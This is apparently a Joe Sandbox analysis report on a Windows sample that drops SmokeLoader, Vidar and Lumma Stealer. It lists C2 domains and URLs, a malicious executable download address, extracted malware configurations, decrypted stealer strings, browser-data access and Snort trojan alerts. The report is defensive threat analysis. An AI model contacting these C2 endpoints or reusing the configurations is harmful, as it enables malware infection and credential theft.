dbfhns.in	190.13.174.94	true
15.164.165.52.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://37.27.34.12/mozglue.dll	false	Avira URL Cloud: safe	unknown
whispedwoodmoodsksl.shop	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://guteyr.cc/tmp/index.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://37.27.34.12/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://45.129.96.86/file/update.exe	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199689717899	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://37.27.34.12/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://37.27.34.12/nss3.dll	false	Avira URL Cloud: safe	unknown
https://37.27.34.12/softokn3.dll	false	Avira URL Cloud: safe	unknown
holicisticscrarws.shop	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: whispedwoodmoodsksl.shop	Avira URL Cloud: Label: malware
Source: http://guteyr.cc/tmp/index.php	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/D	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/H	Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/n	Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp

Found malware configuration

Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 7.3.5876.exe.2170000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Multi AV Scanner detection for domain / URL

Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: dbfhns.in	Virustotal: Detection: 5%	Perma Link
Source: http://guteyr.cc/tmp/index.php	Virustotal: Detection: 15%	Perma Link
Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: http://45.129.96.86/file/update.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5876.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\etrtabd	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: xvJv1BpknZ.exe

Virustotal: Detection: 34%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\etrtabd	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: xvJv1BpknZ.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: boredimperissvieos.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: holicisticscrarws.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: sweetsquarediaslw.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: plaintediousidowsko.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: miniaturefinerninewjs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: zippyfinickysofwps.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: obsceneclassyjuwks.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: acceptabledcooeprs.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: whispedwoodmoodsksl.shop
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: Workgroup: -
Source: 7.3.5876.exe.2170000.0.raw.unpack	String decryptor: swg5EG--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0041537E CryptUnprotectData,	7_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	12_2_6D1625B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	12_2_6D0E4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D114440 PK11_PrivDecrypt,	12_2_6D114440
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1144C0 PK11_PubEncrypt,	12_2_6D1144C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	12_2_6D13A730
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	12_2_6D11A650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F8670 PK11_ExportEncryptedPrivKeyInfo,	12_2_6D0F8670
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D140180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	12_2_6D140180
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1143B0 PK11_PubEncryptPKCS1,PR_SetError,	12_2_6D1143B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	12_2_6D13BD30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	12_2_6D0F7D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D137C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	12_2_6D137C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D113FF0 PK11_PrivDecryptPKCS1,	12_2_6D113FF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D139EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	12_2_6D139EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D113850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	12_2_6D113850
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D119840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	12_2_6D119840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13DA40 SEC_PKCS7ContentIsEncrypted,	12_2_6D13DA40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D113560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	12_2_6D113560

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Unpacked PE file: 7.2.5876.exe.400000.0.unpack

Uses 32bit PE files

Source: xvJv1BpknZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
Source:	Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
Source:	Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
Source:	Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_00409960
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_00409960
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	7_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then dec edx	7_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	7_2_00417062
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	7_2_00417062
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00426174
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	7_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00426271
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00426284
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	7_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, 00008000h	7_2_00403570
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp cl, 0000002Eh	7_2_00421580
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	7_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	7_2_00414660
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edi, ebx	7_2_00436670
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00431680
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	7_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h	7_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	7_2_00423931
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	7_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	7_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	7_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	7_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	7_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	7_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	7_2_02136248
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then dec edx	7_2_0215B2B7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	7_2_021372C9
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	7_2_021372C9
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp cl, 0000002Eh	7_2_021412E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_021463DB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_0213D097
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	7_2_0215917C
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	7_2_02136739
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, 00008000h	7_2_021237D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_021464D8
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_021464EB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_02130519
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_02136B56
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_02144B47
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	7_2_02143B98
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	7_2_02124BD7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_02129BC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	7_2_02129BC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_02144B47
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	7_2_02122807
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edi, ebx	7_2_021568D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	7_2_021348C7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_021518E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	7_2_02130918
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	7_2_02153E13
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	7_2_0212FE1B
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	7_2_02143ECF
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	7_2_02143EFE
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp dword ptr [004421CCh]	7_2_0213CF1A
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	7_2_02145F55
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h]	7_2_02141C89
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then jmp edx	7_2_02142D5B
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	7_2_0212CD77
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	7_2_02135D61

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49708 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49709 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49710 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49711 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49712 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53061 -> 190.13.174.94:80
Source: Traffic	Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.8:51397 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53069 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53070 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53072 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53073 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53079 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53080 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53083 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53084 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53115 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53116 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53117 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53118 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53119 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53120 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53121 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53122 -> 109.175.29.39:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53123 -> 109.175.29.39:80
